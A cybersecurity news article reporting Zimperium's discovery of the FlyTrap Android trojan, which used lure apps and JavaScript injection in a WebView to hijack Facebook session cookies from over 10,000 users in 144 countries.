A new threat to Android technology that cybersecurity researchers have entitled FlyTrap has been discovered hijacking users’ Facebook accounts in their thousands in over 140 different countries by stealing their session cookies.
The FlyTrap strategies rely on basic tactics, using social engineering to trick targets into adding their personal Facebook usernames and passwords to maliciously created applications that have collected data linked to a recent session on social media.
Mobile security experts at the firm Zimperium recently detected the newly launched malware and discovered that the stolen data was accessible to any entity that had found FlyTrap’s dedicated command and control server.
Victims lured through high-quality applications
Campaigns using FlyTrap have been in operation since as early as March this year. The threat actors utilised malicious apps with premium-quality design, which were distributed via Google Play and various third-party online outlets selling Android-related products.
The bait used in this campaign has been varied and included the offer of coupon codes completely free of charge for Google AdWords and the streaming subscription channel Netflix, along with a chance to vote for a favoured football player or team.
Obtaining the offered reward required users to log into the high-quality application using their personal Facebook credentials, with authentication taking place on the social media platform’s authentic domain.
As the insidious application employs Facebook’s genuine single sign-on service, it is unable to harvest users’ details, so FlyTrap instead depends on an injection of JavaScript to collect other sensitive information.
The researchers explained:
“Using this technique, the application opens the legit URL inside a WebView configured with the ability to inject JavaScript code and extracts all the necessary information such as cookies, user account details, location, and IP address by injecting malicious JS code.”
All data obtained in this fashion then go directly to FlyTrap’s command and control server.
FlyTrap malware spreads to attack users based in 144 nations
Over 10,000 users of Android mobile devices in 144 separate countries fell for this social engineering campaign. These figures come directly from FlyTrap’s server, which Zimperium researchers managed to access as the database linked to the attacks was open to all online users.
Aazim Yaswant of Zimperium commented in a recent blog post that FlyTrap’s server had numerous security vulnerabilities that enabled access to the stolen information. Yaswant added that social media accounts are a popular target for malicious actors, who are able to use them for a wide range of fraudulent aims, including misinformation and artificially boosting the popularity of products, pages and websites.
The researcher added:
“Just like any user manipulation, the high-quality graphics and official-looking login screens are common tactics to have users take action that could reveal sensitive information. In this case, while the user is logging into their official account, the FlyTrap Trojan is hijacking the session information for malicious intent.”
Although Flytrap is not employing a brand-new technique, it was still successful in hijacking a substantial number of accounts on Facebook, and Zimperium has warned that with slight modifications, it could become an increasing danger for mobile devices.
